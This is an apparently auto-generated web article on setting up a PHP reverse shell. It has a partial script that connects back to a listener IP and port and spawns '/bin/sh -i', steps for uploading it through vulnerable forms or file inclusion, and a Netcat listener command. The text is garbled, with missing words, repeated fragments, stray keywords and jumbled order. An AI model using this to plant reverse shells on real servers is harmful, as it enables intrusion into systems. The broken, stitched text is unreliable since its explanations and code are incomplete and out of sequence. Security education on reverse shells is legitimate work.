In the field of cybersecurity, a is a script used to establish a remote command session by forcing a compromised web server to initiate an outbound connection to an attacker's machine. While traditionally associated with malicious activity, these scripts are essential tools for ethical hackers and security auditors who use them to demonstrate the impact of vulnerabilities like Remote Code Execution (RCE) or Insecure File Uploads . The Mechanics of "Connecting Back"
The administrator or attacker sets up a on a specific port on their own machine.
: The script is typically uploaded via a vulnerable file upload form, a content management system (CMS) plugin, or by exploiting a file inclusion vulnerability. : Access the script’s URL through a web browser (e.g.,
If you trigger the PHP script but do not receive a connection on your Netcat listener, verify the following configuration points: reverse shell php install
<?php // Reverse shell PHP script - for authorized testing only set_time_limit(0); $ip = '192.168.1.100'; // CHANGE THIS: your listener's IP $port = 4444; // CHANGE THIS: your listener's port
The information and tools discussed in this article are provided strictly for educational purposes and authorized penetration testing . Accessing or using a reverse shell on a system without explicit permission is illegal and constitutes a serious cybercrime. The author and contributors are not responsible for any misuse of this information. Always obtain written authorization before conducting any security assessment.
proc_open() : Spawns an interactive shell ( /bin/sh -i ) on Linux systems. Because of the descriptor mapping, any command typed into the Netcat listener is fed directly into /bin/sh , and the output is piped back to the listener. Alternative PHP Execution Vectors
Once configured, you must get the script onto the target server. In the field of cybersecurity, a is a
A reverse shell initiates a connection from the target out to the attacker. This bypasses inbound firewall rules, which are typically strict. Outbound traffic is often much less restricted, making reverse shells more reliable in real penetration tests.
The script runs and connects back to the listener, establishing a command-line interface. Installing/Executing a PHP Reverse Shell
Most scripts require PHP functions like proc_open() or exec() to be enabled on the server. 3. Upload and Execute
Once uploaded, navigate to the file's URL in a web browser: http://target.com : The script is typically uploaded via a
| Requirement | Details | |-------------|---------| | PHP Version | PHP 4.3+ or 5+ (most modern systems run PHP 7.x or 8.x) | | Required Extensions | pcntl and posix for daemonization (optional, but improves stability) | | Target Access | Ability to upload files to the web server OR execute PHP code via LFI/command injection | | Attacker Machine | A system with Netcat (nc) or Ncat installed; Linux (Kali/Parrot) or Windows with WSL | | Network Connectivity | Outbound TCP connectivity from the target to your machine on the chosen port |
To catch the reverse connection, the testing machine must host an active listener before the PHP file is executed on the server.
nc -lvnp 4444